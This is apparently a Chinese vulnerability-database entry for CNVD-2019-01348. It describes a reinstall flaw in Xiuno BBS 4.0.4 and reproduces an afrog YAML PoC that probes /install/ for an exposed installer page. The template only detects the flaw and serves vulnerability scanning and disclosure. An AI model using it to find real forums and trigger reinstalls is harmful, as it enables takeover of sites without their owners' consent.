CNVD-2019-01348: Xiuno BBS CNVD-2019-01348

日期: 2025-09-01 | 影响软件: Xiuno BBS | POC: 已公开

漏洞描述

Xiuno BBS系统存在系统重装漏洞。该漏洞源于系统安装完毕后未对安装目录进行任何防护或过滤,攻击者可直接通过安装页面重装系统。Xiuno BBS 4.0.4

PoC代码[已公开]

id: CNVD-2019-01348

info:
    name: Xiuno BBS CNVD-2019-01348
    author: 清风明月(www.secbook.info)
    severity: high
    description: Xiuno BBS系统存在系统重装漏洞。该漏洞源于系统安装完毕后未对安装目录进行任何防护或过滤,攻击者可直接通过安装页面重装系统。Xiuno BBS 4.0.4
    reference:
        - https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348

rules:
    r0:
        request:
            method: GET
            path: /install/
            headers:
                Accept-Encoding: deflate
        expression: response.status == 200 && response.body.bcontains(bytes(string("/view/js/xiuno.js"))) && response.body.bcontains(bytes(string("Choose Language (选择语言)")))
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CNVD/2019/CNVD-2019-01348.yaml

相关漏洞推荐